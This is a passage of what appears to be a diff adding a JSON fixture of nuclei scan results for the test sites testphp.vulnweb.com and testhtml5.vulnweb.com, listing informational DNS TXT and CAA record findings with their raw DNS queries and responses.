EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3599\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 108, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.843Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 35355\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 35355\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 109, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.930Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 6392\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 6392\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 110, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.018Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 51937\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 51937\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 111, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.110Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 44035\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 44035\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 112, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.192Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 4219\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 4219\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 113, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.275Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 10437\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 10437\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 114, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.359Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 48285\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 48285\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 115, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.449Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 52041\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 52041\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 116, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.544Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 18087\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 18087\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 117, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.630Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 35735\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 35735\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 118, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.713Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 53113\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 53113\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 119, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.799Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 29006\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 29006\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 120, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.888Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 50644\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 50644\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 121, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:44.973Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 12269\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 12269\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 122, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.064Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 43234\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 43234\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 123, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.157Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 4907\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 4907\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; 